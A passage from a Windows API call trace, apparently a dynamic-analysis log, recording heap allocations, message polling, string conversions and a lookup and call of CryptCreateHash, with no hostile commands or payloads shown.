dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0181.915] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0181.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0181.915] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0181.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0181.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0181.916] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0181.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0181.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0181.916] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0181.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0181.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0181.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.916] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0181.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0181.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0181.916] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0181.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0181.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0181.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0181.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0181.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0181.917] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0181.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0181.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0181.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0181.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0181.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0181.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0181.917] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0181.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0181.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0181.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0181.917] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0181.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0181.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0181.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0181.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0181.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0181.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0181.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0181.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0181.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0181.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0181.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0181.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0181.918] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0181.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b00 [0181.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0181.919] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0181.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0181.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0181.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0181.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0181.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0181.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0181.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0181.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0181.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0181.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0181.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0181.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0181.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0181.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0181.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0181.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0181.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0181.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0181.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0181.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0181.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0181.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0181.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0181.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0181.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0181.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0181.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0181.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0181.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0181.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0181.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0181.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0181.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0181.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0181.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0181.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0181.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0181.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0181.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0181.921] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0181.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0181.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0181.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0181.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0181.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0181.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0181.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0181.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0181.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0181.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0181.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0181.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0181.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0181.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0181.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0181.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0181.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0181.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0181.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0181.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0181.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0181.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0181.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0181.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0181.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0181.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0181.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0181.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0181.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0181.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0181.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0181.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0181.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0181.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0181.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0181.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0181.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0181.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0182.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0182.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0182.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0182.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0182.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0182.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0182.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0182.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0182.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0182.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0182.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0182.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0182.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0182.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0182.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0182.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0182.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0182.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0182.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0182.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0182.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0182.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50a40, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0182.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0182.018] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0182.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0182.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0182.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0182.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0182.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0182.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0182.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0182.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0182.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0182.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0182.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0182.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0182.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0182.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0182.018] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0182.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0182.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0182.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0182.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0182.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0182.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0182.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0182.021] HeapFree (in: hHeap=0x970000, 